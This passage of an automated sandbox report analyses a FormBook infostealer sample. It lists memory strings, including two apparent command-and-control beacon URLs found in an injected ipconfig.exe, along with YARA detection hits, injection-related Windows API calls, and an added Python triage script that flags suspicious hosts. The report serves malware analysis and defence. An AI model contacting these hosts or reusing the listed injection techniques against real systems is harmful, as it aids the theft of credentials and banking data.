Source: 08917506_by_Libranalysis.exe, 00000000.00000003.229924216.0000000005BC8000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.249681781.0000000001AA7000.00000004.00000040.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmp
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/;
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/W
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0r:
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/_
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/a
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/)
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/M
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230081674.0000000005BC4000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmpString found in binary or memory: https://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4
          Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmpString found in binary or memory: https://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k
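          The string table above mixes font-vendor URLs, which the sample and explorer.exe pick up from shared font resources, with two HTTPS URLs that appear only in the memory of ipconfig.exe, the system process this report shows FormBook injecting into. The Python below is an added triage example, not part of the report or of the sandbox's tooling: it parses rows in the report's `Source: … String found in binary or memory: …` layout (with or without the missing separator after `.sdmp`), groups URLs by host, and flags hosts seen in writable memory (PAGE_READWRITE 0x04 or PAGE_EXECUTE_READWRITE 0x40) of a process other than the submitted sample. Two assumptions are labelled in the code: the dump-name field layout (process index, run, serial, base address, page protection, region type) is inferred from the names on this page, and the writable-memory rule is a heuristic that shortlists candidates for an analyst; the report's own "C2 URLs / IPs found in malware configuration" verdict is what confirms them.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# One report row: "Source: <proc>, <dump>.sdmp[, <proc>, <dump>.sdmp] String found in binary or memory: <url>".
# Extracted text may fuse ".sdmp" with "String found", so no whitespace is required at that boundary.
ROW_RE = re.compile(r"^Source:\s*(?P<sources>.+?)\s*String found in binary or memory:\s*(?P<url>\S+)$")

# ASSUMPTION: dump name = <process index>.<run>.<serial>.<base address>.<page protection>.<region type>.sdmp,
# inferred from names on this page such as 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmp.
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp$")

PAGE_READWRITE = 0x04          # Windows memory protection constants
PAGE_EXECUTE_READWRITE = 0x40
WRITABLE = {PAGE_READWRITE, PAGE_EXECUTE_READWRITE}


def parse_sources(text):
    """Split the Source column into (process name, dump fields or None) pairs."""
    parts = [p.strip() for p in text.split(",") if p.strip()]
    pairs, i = [], 0
    while i < len(parts):
        dump = DUMP_RE.match(parts[i + 1]) if i + 1 < len(parts) else None
        pairs.append((parts[i], dump.groupdict() if dump else None))
        i += 2 if dump else 1
    return pairs


def triage(lines, sample_name):
    """Group URLs by host; mark a host suspicious when it sits in writable memory of a process
    other than the submitted sample (heuristic: runtime heap data in a hollowed system process,
    as opposed to read-only mapped font resources)."""
    hosts = defaultdict(lambda: {"urls": set(), "sightings": [], "suspicious": False})
    for line in lines:
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # not a string-table row
        url = m.group("url")
        host = urlsplit(url).hostname or url  # junk suffixes from scanner overrun stay visible in the host
        rec = hosts[host]
        rec["urls"].add(url)
        for proc, dump in parse_sources(m.group("sources")):
            prot = int(dump["prot"], 16) if dump else None
            rec["sightings"].append((proc, prot))
            if proc.lower() != sample_name.lower() and prot in WRITABLE:
                rec["suspicious"] = True
    return dict(hosts)


def flagged_hosts(lines, sample_name):
    """Sorted list of hosts that the heuristic shortlists for analyst review."""
    return sorted(h for h, rec in triage(lines, sample_name).items() if rec["suspicious"])


SAMPLE_NAME = "08917506_by_Libranalysis.exe"
# Constructed input: rows copied from this report, some with the fused ".sdmpString" form.
SAMPLE_ROWS = """
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaa
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmpString found in binary or memory: https://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4
Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmp String found in binary or memory: https://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k
""".strip().splitlines()

if __name__ == "__main__":
    for host, rec in sorted(triage(SAMPLE_ROWS, SAMPLE_NAME).items()):
        flag = "REVIEW" if rec["suspicious"] else "noise "
        print(flag, host, sorted(set(rec["sightings"])))
```

          The rule deliberately leaves the sample's own writable memory out: the bootstrapcdn.com string in the .NET loader's heap is not interesting on its own, while the same string in ipconfig.exe would be. Explorer.exe is cleared because every sighting there is in a read-only (0x02) region, consistent with mapped font resources rather than injected data.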

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, file source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4DE2 NtQuerySystemInformation
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4DA8 NtQuerySystemInformation
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00418260 NtReadFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004182E0 NtClose
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004181AA NtCreateFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041825A NtReadFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BB040 NtSuspendThread
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A10 NtQuerySection
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9560 NtWriteFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BAD30 NtSetContextThread
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA770 NtOpenThread
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9760 NtOpenProcess
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9650 NtQueryValueKey
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B96D0 NtCreateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D999A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D995D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D996D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D996E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D998F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D998A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D999D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A10 NtQuerySection
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A20 NtResumeThread
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D995F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99560 NtWriteFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D997A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A770 NtOpenThread
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99760 NtOpenProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C81B0 NtCreateFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C8260 NtReadFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C82E0 NtClose
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C81AA NtCreateFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C825A NtReadFile
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_030F1D47
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_030F176C
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03118B13
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03117D14
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_0581DD70
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_05810BF0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_05810BDF
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_09571C70
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_0957CC88
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_09571360
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_09572BE8
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_00FC9829
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B825
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C19E
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041CAC5
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00408C50
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C4E5
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C742
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157F900
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01594120
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164E824
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631002
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016428EC
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158B090
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016420A8
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A20A0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AB40
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01642B28
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163DBD2
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016303DA
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AEBB0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162FA2B
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016422AE
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01641D55
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01642D07
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01570D20
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158D5E0
